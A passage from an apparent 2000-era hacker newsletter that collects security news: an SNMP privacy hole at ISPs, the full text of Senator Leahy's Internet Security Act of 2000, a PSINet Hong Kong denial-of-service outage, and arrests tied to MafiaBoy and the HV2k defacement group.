content. We haven't been seeing theft with this content so far. But (the reluctant labels) are allowing piracy to take place by not putting up a legitimate source of content" @HWA 91.0 [HNN] ISPs Still Vulnerable to SNMP Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Javaman Whiles holes in SNMP are nothing new it is surprising just how vulnerable some ISPs still are to the problem. Philtered.net says that now a malicious person could extract an ISP users login name and phone number directly from the terminal server thereby equating an IP address with a real person. Internet News Philtered.net http://www.internetnews.com/isp-news/article/0,2171,8_344971,00.html http://www.philtered.net/ ISPs Battle Privacy Loophole By Brian McWilliams Internet service providers Thursday are being warned to batten down their network access servers against a familiar type of privacy attack that's making a comeback. According to a bug-tracking group, so-called greyhat hackers say they have developed a Perl script that can quietly extract subscribers' phone numbers and log-in names directly off an ISP's terminal servers using the Simple Network Management Protocol (SNMP). Philadelphia-based Philtered.Net is an online community that pursues their own venue of security-related technical projects. One of the groups hackers, who uses the handle "Lumpy," said an unauthorized person, armed with the script and an Internet user's IP address, can easily query a database on the ISPs access server. According to Lumpy, it's easy to call the management information base of an ISPs access server and use standard SNMP commands to transform an anonymous IP address into the real-world coordinates of a live person. "People usually think that their IP address is as far as a hacker could go to find out who they are," Lumpy said. "But a hacker has the ability to find out who they are through a server directory to discover a person's home phone numbers and full address." Lumpy also works as a security consultant and authored the script for probing SNMP information. He recently posted the information and the script on the Bugtraq mailing list. Lumpy said three major ISPs were vulnerable to the attack, but after being notified the firms took action and properly locked down their servers to prevent SNMP access. Lumpy also claims that some ISPs have their servers configured to allow write access permissions to their MIBs and that he's been able to force dial-up users offline. Jeff Case, president of SNMP.com, a Tennessee-based network management-consulting firm, said the unsecured nature of older versions of SNMP is common knowledge. "The first version of SNMP is not secure and is subject to these sorts of attacks," Case said. "We've know about that since 1988 and a new version of SNMP was made available in 1998. It's been deployed to plug-up the security holes." But Lumpy of Philtered.net said that most ISPs could prevent unauthorized access to their MIBs by properly configuring the hardware when technicians initially set up a network. "The reason these holes exists is because people have not bothered to read the manual where it says in big letters 'change your community names and block off access to SNMP,' but some ISPs aren't wasting time reading manuals so this is what happens." ISPs that want to determine if a SNMP privacy hole exists on their networks can check out the BugTraq advisory at SecurityFocus.com in order to tighten-up access to their networks. @HWA 92.0 [HNN] Internet Security Act of 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Weld Pond Senator Patrick Leahy has introduced into the Senate the Internet Security Act of 2000. The bill will give more leeway to law enforcement to use pen registers and trap and trace devices, remove the 'loophole' that prevents officers from from monitoring an innocent-host computer without a wiretap order and contains provisions for equipment forfeiture. (This may be a little over reaction, seems like a lot of power granted law enforcement.) S 2430 - via Cryptome http://cryptome.org/s2430is.txt [Congressional Record: April 13, 2000 (Senate)] [Page S2729-S2771] From the Congressional Record Online via GPO Access [wais.access.gpo.gov] [DOCID:cr13ap00pt2-155] STATEMENTS ON INTRODUCED BILLS AND JOINT RESOLUTIONS [Excerpt] By Mr. LEAHY: S. 2430. A bill to combat computer hacking through enhanced law enforcement and to protect the privacy and constitutional rights of Americans, and for other purposes; to the Committee on the Judiciary. Internet Security Act of 2000 Mr. LEAHY. Mr. President, as we head into the twenty-first century, computer-related crime is one of the greatest challenges facing law enforcement. Many of our critical infrastructures and our government depend upon the reliability and security of complex computer systems. We need to make sure that these essential systems are protected from all forms of attack. The legislation I am introducing today will help law enforcement investigate and prosecute those who jeopardize the integrity of our computer systems and the Internet. Whether we work in the private sector or in government, we negotiate daily through a variety of security checkpoints designed to protect ourselves from being victimized by crime or targeted by terrorists. For instance, congressional buildings like this one use cement pillars placed at entrances, photo identification cards, metal detectors, x-ray scanners, and security guards to protect the physical space. These security steps and others have become ubiquitous in the private sector as well. Yet all these physical barriers can be circumvented using the wires that run into every building to support the computers and computer networks that are the mainstay of how we communicate and do business. This plain fact was amply demonstrated by the recent hacker attacks on E-Trade, ZDNet, Datek, Yahoo, eBay, Amazon.com and other Internet sites. These attacks raise serious questions about Internet security-- questions that we need to answer to ensure the long-term stability of electronic commerce. More importantly, a well-focused and more malign cyber-attack on computer networks that support telecommunications, transportation, water supply, banking, electrical power and other critical infrastructure systems could wreak havoc on our national economy or even jeopardize our national defense. We have learned that even law enforcement is not immune. Just recently we learned of a denial of service attack successfully perpetrated against a FBI web site, shutting down that site for several hours. The cybercrime problem is growing. The reports of the CERT Coordination Center (formerly called the ``Computer Emergency Response Team''), which was established in 1988 to help the Internet community detect and resolve computer security incidents, provide chilling statistics on the vulnerabilities of the Internet and the scope of the problem. Over the last decade, the number of reported computer security incidents grew from 6 in 1988 to more than 8,000 in 1999. But that alone does not reveal the scope of the problem. According to CERT's most recent annual report, more than four million computer hosts were affected by the computer security incidents in 1999 alone by damaging computer viruses, with names like ``Melissa,'' ``Chernobyl,'' ``ExploreZip,'' and by the other ways that remote intruders have found to exploit system vulnerabilities. Even before the recent headline- grabbing ``denial-of-service'' attacks, CERT documented that such incidents ``grew at rate around 50% per year'' which was ``greater than the rate of growth of Internet hosts.'' CERT has tracked recent trends in severe hacking incidents on the Internet and made the following observations, First, hacking techniques are getting more sophisticated. That means law enforcement is going to have to get smarter too, and we need to give them the resources to do this. Second, hackers have ``become increasingly difficult to locate and identify.'' These criminals are operating in many different locations and are using techniques that allow them to operate in ``nearly total obscurity.'' We have been aware of the vulnerabilities to terrorist attacks of our computer networks for more than a decade. It became clear to me, when I chaired a series of hearings in 1988 and 1989 by the Subcommittee on Technology and the Law in the Senate Judiciary Committee on the subject of high-tech terrorism and the threat of computer viruses, that merely ``hardening'' our physical space from potential attack would only prompt committed criminals and terrorists to switch tactics and use new technologies to reach vulnerable softer targets, such as our computer systems and other critical infrastructures. The government has a responsibility to work with those in the private sector to assess those vulnerabilities and defend them. That means making sure our law enforcement agencies have the tools they need, but also that the government does not stand in the way of smart technical solutions to defend our computer systems. Targeting cybercrime with up-to-date criminal laws and tougher law enforcement is only part of the solution. While criminal penalties may deter some computer criminals, these laws usually come into play too late, after the crime has been committed and the injury inflicted. We should keep in mind the adage that the best defense is a good offense. Americans and American firms must be encouraged to take preventive measures to protect their computer information and systems. Just recently, internet providers and companies such as Yahoo! and Amazon.com Inc., and computer hardware companies such a Cisco Systems Inc., proved successful at stemming attacks within hours thereby limiting losses. That is why, for years, I have advocated and sponsored legislation to encourage the widespread use of strong encryption. Encryption is an important tool in our arsenal to protect the security of our computer information and networks. The Administration made enormous progress earlier this year when it issued new regulations relaxing export controls on strong encryption. Of course, encryption technology cannot be the sole source of protection for our critical computer networks and computer-based infrastructure, but we need to make sure the government is encouraging--and not restraining--the use of strong encryption and other technical solutions to protecting our computer systems. Congress has responded again and again to help our law enforcement agencies keep up with the challenges of new crimes being executed over computer networks. In 1984, we passed the Computer Fraud and Abuse Act, and its amendments, to criminalize conduct when carried out by means of unauthorized access to a computer. In 1986, we passed the Electronic Communications Privacy Act (ECPA), which I was proud to sponsor, to criminalize tampering with electronic mail systems and remote data processing systems and to protect the privacy of computer users. In the 104th Congress, Senators Kyl, Grassley, and I worked together to enact the National Information Infrastructure Protection Act to increase protection under federal criminal law for both government and private computers, and to address an emerging problem of computer-age blackmail in which a criminal threatens to harm or shut down a computer system unless their extortion demands are met. [[Page S2739]] In this Congress, I have introduced a bill with Senator DeWine, the Computer Crime Enforcement Act, S. 1314, to set up a $25 million grant program within the U.S. Department of Justice for states to tap for improved education, training, enforcement and prosecution of computer crimes. All 50 states have now enacted tough computer crime control laws. These state laws establish a firm groundwork for electronic commerce and Internet security. Unfortunately, too many state and local law enforcement agencies are struggling to afford the high cost of training and equipment necessary for effective enforcement of their state computer crime statutes. Our legislation, the Computer Crime Enforcement Act, would help state and local law enforcement join the fight to combat the worsening threats we face from computer crime. Computer crime is a problem nationwide and in Vermont. I recently released a survey on computer crime in Vermont. My office surveyed 54 law enforcement agencies in Vermont--43 police departments and 11 State's attorney offices--on their experience investigating and prosecuting computer crimes. The survey found that more than half of these Vermont law enforcement agencies encounter computer crime, with many police departments and state's attorney offices handling 2 to 5 computer crimes per month. Despite this documented need, far too many law enforcement agencies in Vermont cannot afford the cost of policing against computer crimes. Indeed, my survey found that 98% of the responding Vermont law enforcement agencies do not have funds dedicated for use in computer crime enforcement. My survey also found that few law enforcement officers in Vermont are properly trained in investigating computer crimes and analyzing cyber- evidence. According to my survey, 83% of responding law enforcement agencies in Vermont do not employ officers properly trained in computer crime investigative techniques. Moreover, my survey found that 52% of the law enforcement agencies that handle one or more computer crimes per month cited their lack of training as a problem encountered during investigations. Proper training is critical to ensuring success in the fight against computer crime. This bill will help our computer crime laws up to date as an important backstop and deterrent. I believe that our current computer crime laws can be enhanced and that the time to act is now. We should pass legislation designed to improve our law enforcement efforts while at the same time protecting the privacy rights of American citizens. The bill I offer today will make it more efficient for law enforcement to use tools that are already available--such as pen registers and trap and trace devices--to track down computer criminals expeditiously. It will ensure that law enforcement can investigate and prosecute hacker attacks even when perpetrators use foreign-based computers to facilitate their crimes. It will implement criminal forfeiture provisions to ensure that cybercriminals are forced to relinquish the tools of their trade upon conviction. It will also close a current loophole in our wiretap laws that prevents a law enforcement officer from monitoring an innocent-host computer with the consent of the computer's owner and without a wiretap order to track down the source of denial-of-service attacks. Finally, this legislation will assist state and local police departments in their parallel efforts to combat cybercrime, in recognition of the fact that this fight is not just at the federal level. The key provisions of the bill are: Jurisdictional and Definitional Changes to the Computer Fraud and Abuse Act: The Computer Fraud and Abuse Act, 18 U.S.C. Sec. 1030, is the primary federal criminal statute prohibiting computer frauds and hacking. This bill would amend the statute to clarify the appropriate scope of federal jurisdiction. First, the bill adds a broad definition of ``loss'' to the definitional section. Calculation of loss is important both in determining whether the $5,000 jurisdictional hurdle in the statute is met, and, at sentencing, in calculating the appropriate guideline range and restitution amount. Second, the bill amends the definition of ``protected computer,'' to expressly include qualified computers even when they are physically located outside of the United States. This clarification will preserve the ability of the United States to assist in international hacking cases. A ``Sense of Congress'' provision specifies that federal jurisdiction is justified by the ``interconnected and interdependent nature of computers used in interstate or foreign commerce.'' Finally, the bill expands the jurisdiction of the United States Secret Service to encompass investigations of all violations of 18 U.S.C. Sec. 1030. Prior to the 1996 amendments to the Computer Fraud and Abuse Act, the Secret Service was authorized to investigate any and all violations of section 1030, pursuant to an agreement between the Secretary of Treasury and the Attorney General. The 1996 amendments, however, concentrated Secret Service jurisdiction on certain specified subsections of section 1030. The current amendment would return full jurisdiction to the Secret Service and would allow the Justice and Treasury Departments to decide on the appropriate work-sharing balance between the two. Elimination of Mandatory Minimum Sentence for Certain Violations of Computer Fraud and Abuse Act: Currently, a directive to the Sentencing Commission requires that all violations, including misdemeanor violations, of certain provisions of the Computer Fraud and Abuse Act be punished with a term of imprisonment of at least six months. The bill would change this directive to the Sentencing Commission so that no such mandatory minimum would be required. Additional Criminal Forfeiture Provisions: The bill adds a criminal forfeiture provision to the Computer Fraud and Abuse Act, requiring forfeiture of physical property used in or to facilitate the offense as well as property derived from proceeds of the offense. It also supplements the current forfeiture provision in 18 U.S.C. 2318, which prohibits trafficking in, among other things, counterfeit computer program documentation and packaging, to require the forfeiture of replicators and other devices used in the production of such counterfeit items. Pen Registers and Trap and Trace Devices: The bill makes it easier for law enforcement to use these investigative techniques in the area of cybercrime, and institutes corresponding privacy protections. On the law enforcement side, the bill gives nationwide effect to pen register and trap and trace orders obtained by Government attorneys, thus obviating the need to obtain identical orders in multiple federal jurisdictions. It also clarifies that such devices can be used on all electronic communication lines, not just telephone lines. On the privacy side, the bill provides for greater judicial review of applications for pen registers and trap and trace devices and institutes a minimization requirement for the use of such devices. The bill also amends the reporting requirements for applications for such devices by specifying the information to be reported. Denial of Service Investigations: Currently, a person whose computer is accessed by a hacker as a means for the hacker to reach a third computer cannot simply consent to law enforcement monitoring of his computer. Instead, because this person is not technically a party to the communication, law enforcement needs wiretap authorization under Title III to conduct such monitoring. The bill will close this loophole by explicitly permitting such monitoring without a wiretap if prior consent is obtained from the person whose computer is being hacked through and used to send ``harmful interference to a lawfully operating computer system.'' Encryption Reporting: The bill directs the Attorney General to report the number of wiretap orders in which encryption was encountered and whether such encryption precluded law enforcement from obtaining the plaintext of intercepted communications. State and Local Computer Crime Enforcement: The bill directs the Office of Federal Programs to make grants to assist State and local law enforcement in the investigation and prosecution of computer crime. Legislation must be balanced to protect our privacy and other constitutional rights. I am a strong proponent [[Page S2740]] of the Internet and a defender of our constitutional rights to speak freely and to keep private our confidential affairs from either private sector snoops or unreasonable government searches. These principles can be respected at the same time we hold accountable those malicious mischief makers and digital graffiti sprayers, who use computers to damage or destroy the property of others. I have seen Congress react reflexively in the past to address concerns over anti-social behavior on the Internet with legislative proposals that would do more harm than good. A good example of this is the Communications Decency Act, which the Supreme Court declared unconstitutional. We must make sure that our legislative efforts are precisely targeted on stopping destructive acts and that we avoid scattershot proposals that would threaten, rather than foster, electronic commerce and sacrifice, rather than promote, our constitutional rights. Technology has ushered in a new age filled with unlimited potential for commerce and communications. But the Internet age has also ushered in new challenges for federal, state and local law enforcement officials. Congress and the Administration need to work together to meet these new challenges while preserving the benefits of our new era. The legislation I offer today is a step in that direction. Mr. President, I ask unanimous consent that the text of the bill be printed in the Record. There being no objection, the bill was ordered to be printed in the Record, as follows: S. 2430 Be it enacted by the Senate and House of Representatives of the United States of America in Congress assembled, SECTION 1. SHORT TITLE. This Act may be cited as the ``Internet Security Act of 2000''. SEC. 2. AMENDMENTS TO THE COMPUTER FRAUD AND ABUSE ACT. Section 1030 of title 18, United States Code, is amended-- (1) in subsection (a)-- (A) in paragraph (5)-- (i) by inserting ``(i)'' after ``(A)'' and redesignating subparagraphs (B) and (C) as clauses (ii) and (iii), respectively; (ii) in subparagraph (A)(iii), as redesignated, by adding ``and'' at the end; and (iii) by adding at the end the following: ``(B) the conduct described in clause (i), (ii), or (iii) of subparagraph (A)-- ``(i) caused loss aggregating at least $5,000 in value during a 1-year period to 1 or more individuals; ``(ii) modified or impaired, or potentially modified or impaired, the medical examination, diagnosis, treatment, or care of 1 or more individuals; ``(iii) caused physical injury to any person; or ``(iv) threatened public health or safety;''; and (B) in paragraph (6), by adding ``or'' at the end; (2) in subsection (c)-- (A) in paragraph (2)-- (i) in subparagraph (A), by striking ``and'' at the end; and (ii) in subparagraph (B), by inserting ``or an attempted offense'' after ``in the case of an offense''; and (B) by adding at the end the following: ``(4) forfeiture to the United States in accordance with subsection (i) of the interest of the offender in-- ``(A) any personal property used or intended to be used to commit or to facilitate the commission of the offense; and ``(B) any property, real or personal, that constitutes or that is derived from proceeds traceable to any violation of this section.''; (3) in subsection (d)-- (A) by striking ``subsections (a)(2)(A), (a)(2)(B), (a)(3), (a)(4), (a)(5), and (a)(6) of''; and (B) by striking ``which shall be entered into by'' and inserting ``between''; (4) in subsection (e)-- (A) in paragraph (2)(B), by inserting ``, including computers located outside the United States'' before the semicolon; (B) in paragraph (4), by striking the period at the end and inserting a semicolon; (C) in paragraph (7), by striking ``and'' at the end; (D) in paragraph (8), by striking ``, that'' and all that follows through ``; and'' and inserting a semicolon; (E) in paragraph (9), by striking the period at the end and inserting ``; and''; and (F) by adding at the end the following: ``(10) the term `loss' includes-- ``(A) the reasonable costs to any victim of-- ``(i) responding to the offense; ``(ii) conducting a damage assessment; and ``(iii) restoring the system and data to their condition prior to the offense; and ``(B) any lost revenue or costs incurred by the victim as a result of interruption of service.''; (5) in subsection (g), by striking ``Damages for violations involving damage as defined in subsection (c)(8)(A)'' and inserting ``losses specified in subsection (a)(5)(B)(i)''; and (6) by adding at the end the following: ``(i) Provisions Governing Forfeiture.--Property subject to forfeiture under this section, any seizure and disposition thereof, and any administrative or judicial proceeding in relation thereto, shall be governed by subsection (c) and subsections (e) through (p) of section 413 of the Comprehensive Drug Abuse Prevention and Control Act of 1970 (21 U.S.C. 853).''. SEC. 3. SENSE OF CONGRESS. It is the sense of Congress that-- (1) acts that damage or attempt to damage computers used in the delivery of critical infrastructure services such as telecommunications, energy, transportation, banking and financial services, and emergency and government services pose a serious threat to public health and safety and cause or have the potential to cause losses to victims that include costs of responding to offenses, conducting damage assessments, and restoring systems and data to their condition prior to the offense, as well as lost revenue and costs incurred as a result of interruptions of service; and (2) the Federal Government should have jurisdiction to investigate acts affecting protected computers, as defined in section 1030(e)(2)(B) of title 18, United States Code, as amended by this Act, even if the effects of such acts occur wholly outside the United States, as in such instances a sufficient Federal nexus is conferred through the interconnected and interdependent nature of computers used in interstate or foreign commerce or communication. SEC. 4. MODIFICATION OF SENTENCING COMMISSION DIRECTIVE. Pursuant to its authority under section 994(p) of title 28, United States Code, the United States Sentencing Commission shall amend the Federal sentencing guidelines to ensure that any individual convicted of a violation of paragraph (4) or (5) of section 1030(a) of title 18, United States Code, can be subjected to appropriate penalties, without regard to any mandatory minimum term of imprisonment. SEC. 5. FORFEITURE OF DEVICES USED IN COMPUTER SOFTWARE COUNTERFEITING. Section 2318(d) of title 18, United States Code, is amended by-- (1) inserting ``(1)'' before ``When''; (2) inserting ``, and any replicator or other device or thing used to copy or produce the computer program or other item to which the counterfeit label was affixed, or was intended to be affixed'' before the period; and (3) by adding at the end the following: ``(2) The forfeiture of property under this section, including any seizure and disposition of the property, and any related judicial or administrative proceeding, shall be governed by the provisions of section 413 (other than subsection (d) of that section) of the Comprehensive Drug Abuse Prevention and Control Act of 1970 (21 U.S.C. 853).''. SEC. 6. CONFORMING AMENDMENT. Section 492 of title 18, United States Code, is amended by striking ``or 1720,'' and inserting ``, 1720, or 2318''. SEC. 7. PEN REGISTERS AND TRAP AND TRACE DEVICES. Section 3123 of title 18, United States Code is amended-- (1) by striking subsection (a) and inserting the following: ``(a) Issuance of Order.-- ``(1) Requests from attorneys for the government.--Upon an application made under section 3122(a)(1), the court may enter an ex parte order authorizing the installation and use of a pen register or a trap and trace device if the court finds, based on the certification by the attorney for the Government, that the information likely to be obtained by such installation and use is relevant to an ongoing criminal investigation. Such order shall apply to any entity providing wire or electronic communication service in the United States whose assistance is necessary to effectuate the order. ``(2) Requests from state investigative or law enforcement officers.--Upon an application made under section 3122(a)(2), the court may enter an ex parte order authorizing the installation and use of a pen register or a trap and trace device within the jurisdiction of the court, if the court finds, based on the certification by the State law enforcement or investigative officer, that the information likely to be obtained by such installation and use is relevant to an ongoing criminal investigation.''; and (2) in subsection (b)-- (A) in paragraph (1)-- (i) in subparagraph (C), by inserting ``authorized under subsection (a)(2)'' after ``in the case of a trap and trace device''; and (ii) in subparagraph (D), by striking ``and'' at the end; (B) in paragraph (2), by striking the period at the end and inserting ``; and''; and (C) by adding at the end the following: ``(3) shall direct that the use of the pen register or trap and trace device be conducted in such a way as to minimize the recording or decoding of any electronic or other impulses that are not related to the dialing and signaling information utilized in processing by the service provider upon whom the order is served.''. SEC. 8. TECHNICAL AMENDMENTS TO PEN REGISTER AND TRAP AND TRACE PROVISIONS. (a) Issuance of an Order.--Section 3123 of title 18, United States Code, is amended-- (1) by inserting ``or other facility'' after ``line'' each place that term appears; [[Page S2741]] (2) by inserting ``or applied'' after ``attached'' each place that term appears; (3) in subsection (b)(1)(C), by inserting ``or other identifier'' after ``the number''; and (4) in subsection (d)(2), by striking ``who has been ordered by the court'' and inserting ``who is obligated by the order''. (b) Definitions.--Section 3127 of title 18, United States Code is amended-- (1) by striking paragraph (3) and inserting the following: ``(3) the term `pen register'-- ``(A) means a device or process that records or decodes electronic or other impulses that identify the telephone numbers or electronic address dialed or otherwise transmitted by an instrument or facility from which a wire or electronic communication is transmitted and used for purposes of identifying the destination or termination of such communication by the service provider upon which the order is served; and ``(B) does not include any device or process used by a provider or customer of a wire or electronic communication service for billing, or recording as an incident to billing, for communications services provided by such provider or any device or process by a provider or customer of a wire communication service for cost accounting or other like purposes in the ordinary course of its business;''; and (2) in paragraph (4)-- (A) by inserting ``or process'' after ``means a device''; (B) by inserting ``or other identifier'' after ``number''; and (C) by striking ``or device'' and inserting ``or other facility''. SEC. 9. PEN REGISTER AND TRAP AND TRACE REPORTS. Section 3126 of title 18, United States Code, is amended by inserting before the period at the end the following: ``, which report shall include information concerning-- ``(1) the period of interceptions authorized by the order, and the number and duration of any extensions of the order; ``(2) the offense specified in the order or application, or extension of an order; ``(3) the number of investigations involved; ``(4) the number and nature of the facilities affected; and ``(5) the identity, including district, of the applying investigative or law enforcement agency making the application and the person authorizing the order''. SEC. 10. ENHANCED DENIAL OF SERVICE INVESTIGATIONS. Section 2511(2)(c) of title 18, United States Code, is amended to read as follows: ``(c)(i) It shall not be unlawful under this chapter for a person acting under color of law to intercept a wire, oral, or electronic communication, if such person is a party to the communication or 1 of the parties to the communication has given prior consent to such interception. ``(ii) It shall not be unlawful under this chapter for a person acting under color of law to intercept a wire or electronic communication, if-- ``(I) the transmission of the wire or electronic communication is causing harmful interference to a lawfully operating computer system; ``(II) any person who is not a provider of service to the public and who is authorized to use the facility from which the wire or electronic communication is to be intercepted has given prior consent to the interception; and ``(III) the interception is conducted only to the extent necessary to identify the source of the harmful interference described in subclause (I).''. SEC. 11. ENCRYPTION REPORTING REQUIREMENTS. Section 2519(2)(b) of title 18, United States Code, is amended by striking ``and (iv)'' and inserting ``(iv) the number of orders in which encryption was encountered and whether such encryption prevented law enforcement from obtaining the plain text of communications intercepted pursuant to such order, and (v)''. SEC. 12. STATE AND LOCAL COMPUTER CRIME ENFORCEMENT. (a) In General.--Subject to the availability of amounts provided in advance in appropriations Acts, the Assistant Attorney General for the Office of Justice Programs of the Department of Justice shall make a grant to each State, which shall be used by the State, in conjunction with units of local government, State and local courts, other States, or combinations thereof, to-- (1) assist State and local law enforcement in enforcing State and local criminal laws relating to computer crime; (2) assist State and local law enforcement in educating the public to prevent and identify computer crime; (3) assist in educating and training State and local law enforcement officers and prosecutors to conduct investigations and forensic analyses of evidence and prosecutions of computer crime; (4) assist State and local law enforcement officers and prosecutors in acquiring computer and other equipment to conduct investigations and forensic analysis of evidence of computer crimes; and (5) facilitate and promote the sharing of Federal law enforcement expertise and information about the investigation, analysis, and prosecution of computer crimes with State and local law enforcement officers and prosecutors, including the use of multijurisdictional task forces. (b) Use of Grant Amounts.--Grants under this section may be used to establish and develop programs to-- (1) assist State and local law enforcement agencies in enforcing State and local criminal laws relating to computer crime; (2) assist State and local law enforcement agencies in educating the public to prevent and identify computer crime; (3) educate and train State and local law enforcement officers and prosecutors to conduct investigations and forensic analyses of evidence and prosecutions of computer crime; (4) assist State and local law enforcement officers and prosecutors in acquiring computer and other equipment to conduct investigations and forensic analysis of evidence of computer crimes; and (5) facilitate and promote the sharing of Federal law enforcement expertise and information about the investigation, analysis, and prosecution of computer crimes with State and local law enforcement officers and prosecutors, including the use of multijurisdictional task forces. (c) Assurances.--To be eligible to receive a grant under this section, a State shall provide assurances to the Attorney General that the State-- (1) has in effect laws that penalize computer crime, such as penal laws prohibiting-- (A) fraudulent schemes executed by means of a computer system or network; (B) the unlawful damaging, destroying, altering, deleting, removing of computer software, or data contained in a computer, computer system, computer program, or computer network; or (C) the unlawful interference with the operation of or denial of access to a computer, computer program, computer system, or computer network; (2) an assessment of the State and local resource needs, including criminal justice resources being devoted to the investigation and enforcement of computer crime laws; and (3) a plan for coordinating the programs funded under this section with other federally funded technical assistant and training programs, including directly funded local programs such as the Local Law Enforcement Block Grant program (described under the heading ``Violent Crime Reduction Programs, State and Local Law Enforcement Assistance'' of the Departments of Commerce, Justice, and State, the Judiciary, and Related Agencies Appropriations Act, 1998 (Public Law 105-119)). (d) Matching Funds.--The Federal share of a grant received under this section may not exceed 90 percent of the total cost of a program or proposal funded under this section unless the Attorney General waives, wholly or in part, the requirements of this subsection. (e) Authorization of Appropriations.-- (1) In general.--There is authorized to be appropriated to carry out this section $25,000,000 for each of fiscal years 2000 through 2003. (2) Limitations.--Of the amount made available to carry out this section in any fiscal year not more than 3 percent may be used by the Attorney General for salaries and administrative expenses. (3) Minimum amount.--Unless all eligible applications submitted by any State or units of local government within a State for a grant under this section have been funded, the State, together with grantees within the State (other than Indian tribes), shall be allocated in each fiscal year under this section not less than 0.75 percent of the total amount appropriated in the fiscal year for grants pursuant to this section, except that the United States Virgin Islands, American Samoa, Guam, and the Northern Mariana Islands each shall be allocated 0.25 percent. (f) Grants to Indian Tribes.--Notwithstanding any other provision of this section, the Attorney General may use amounts made available under this section to make grants to Indian tribes for use in accordance with this section. ______ @HWA 93.0 [HNN] PSINet Hit with DoS Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse A denial-of-service attack on PSINet Hong Kong on Wednesday disabled the Internet service provider's Web-hosting servers for most of the day, leaving many of its dotcom customers without e-mail and Web sites. However, more than a day after the attack took place, the ISP was still unable to determine whether it was the result of an outside attacker or an internal blunder. Technology Post http://www.technologypost.com/internet/Daily/20000420194747504.asp?Section Published on Thursday, April 20, 2000 INTERNET PSINet hit by denial-of-service attack NEIL ART -------------------------------------------------------------------------- ------ Updated at 8.55pm: A denial-of-service attack on PSINet Hong Kong on Wednesday disabled the Internet service provider's Web-hosting servers for most of the day, leaving many of its dotcom customers without e-mail and Web sites. However, more than a day after the attack took place, the ISP was still unable to determine whether it was the result of an outside hacker or an internal blunder. William Kwan, president PSINet Hong Kong, said "unusual amounts of traffic were generated by a desktop computer through the network", which might have been caused by a programmer checking data traffic. A denial-of-service attack is one in which a large volume, or packets, of information are continually sent to a network server, disrupting network connectivity because the server is unable to answer the demand. "We don't know what caused the large volume of traffic," Mr Kwan said, adding that the company had not contacted the police. The attack started around 1.45pm on Wednesday, PSINet said, adding that its leased-line network was partially restored in two hours and fully restored by 7pm. However, PSINet's dial-up network was still experiencing problems as late as midnight, according to some of its customers. Clients said their e-mail services and Web sites were down for most of the day. Dennis Skouse, managing director Spin Design and Advertising, said he came to work around 9.30am to find his e-mail box missing. His computer gave him a message that it could not locate the server. He said his company "absolutely relied" on e-mail to "send PDF [portable document format] files all over the place for [client] approval". Mr Skouse said that throughout the day he was sporadically able to access and check his e-mail. He said it was bad timing because many people were leaving Hong Kong for the Easter holiday and wanted to finalise designs with his firm before doing so. David Croasdale, business director Newell Public Relations, said the company was off-line from mid-morning for most of the day. "We rely a lot on e-mail to keep in touch with clients," he said. "Our clients rely on Newell to get their messages out." Newell founder Stuart Newell said: "The whole office felt completely out of touch. Potentially, it could have a serious effect on business in Hong Kong." Advedi, a Web and e-mail services company, was also adversely affected, as were many of its clients, said Patrick Ceulemans, co-founder and director of Advedi. "Basically, we are out of business as well as our clients," he said, adding, however, that his company was able to re-establish service with another ISP. "It was down for at least two hours that I know of," said Mr Ceulemans. "It is unfortunate, but this is life." He said he had e-mailed PSINet, but it had not responded. "There should be some system in place to notify clients, so that they in turn may take appropriate action," said Mr Ceulemans. PSINet declined to comment on the disruption to its services when contacted on Wednesday night, but issued a brief statement on Thursday. It said the disruption of service was due to PSINet's sharing of an internal PC network with that of the customer network. "Remedial actions have been taken immediately by relocating and reconfiguring our internal network. We will do our utmost to minimise similar problems from occurring in the future." @HWA 94.0 [HNN] Satellite Jammer Plans on Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Odin With $7500 in spare parts and plans found on the Internet a US Air Force team built what they say can successfully jam satellite signals. Unfortunately they didn't give the effective range of the jamming device or the URL to the plans. New Scientist http://www.newscientist.com/news/news_223528.html ( Shit, not found, anyone have this or any other details email me! - Ed) @HWA 95.0 [HNN] GNIT Vulnerability Scanner Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by m0nk The GNIT vulnerability Scanner has been almost completely redesigned from the ground up to perform a scan for open ports. Many new functions have been added to this new release of GNIT, including the great new feature of a custom generated html output after a scan has been run. Only for windows NT or 2000. ellicit.org http://security.ellicit.org @HWA 96.0 [HNN] Free MafiaBoy ~~~~~~~~~~~~~~~~~~~ contributed by Bigfoot Someone has set up a 'Free MafiaBoy' web site. Free MafiaBoy http://www.geocities.com/freemafiaboy/ @HWA 97.0 [HNN] MafiaBoy News Roundup ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 24th contributed by ATKeiper and TwiLyght While the saga of Elian Gonzalez played out in the popular media over the weekend the tech reporters were busy trying to find a new angle on the MafiaBoy arrest last week. MafiaBoy has been charged in Canada with initiating a denial of service attack against CNN. MafiaBoy's lawyer has said that they expect a long, complex and technical trial. (Hopefully this means that he will not be pleading out.) Washington Post Canadian police said on Saturday they had charged MafiaBoy's father of conspiring with another man to commit assault. Evidence for the charges was gathered by using the wiretaps originally placed to gather evidence on the boy. Reuters - via Go2net The Free MafiaBoy web site has supposedly been threatened with a lawsuit by the lawyers for relatives of Michael Lyle. Michael Lyle claims to have had IRC conversations with MafiaBoy prior to his arrest. Free MafiaBoy The Toronto Star ran a rather interesting political cartoon regarding MafiaBoy yesterday. The Toronto Star http://www.washingtonpost.com/wp-dyn/business/A53181-2000Apr20.html http://www.go2net.com/headlines/general/20000422/186850.html http://www.geocities.com/freemafiaboy/ http://www.thestar.com/thestar/back_issues/ED20000423/opinion/20000423NEW02x_ED-CARTOON.html @HWA 98.0 [HNN] Members of HV2k Raided ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 24th contributed by at033 HV2k aka High Voltage 2000 appears to have been raided in relation to several Canadian and US government defacements. SLiPY was raided in late January by DND, NIS and the RCMP. The next day eg0death (Bleeding Angel) was arrested by the US authorities in Texas. The current status of eg0death, who was also in Global Hell, and SliPY are unclear at this time. Someone calling themselves HV2k defaced the web server of the US DHHS last Friday evening with a message "HV2k won't die". HV2K is credited with defacing the same server on 11/2/99. Ottawa Citizen - This article gives almost no information Attrition.org - List of Over 50 Defacements Attributed to HV2k http://www.ottawacitizen.com/hightech/000327/3825256.html http://www.attrition.org/mirror/attrition/hV2ka.html Cyber-mischief shows potential for damaging future attacks 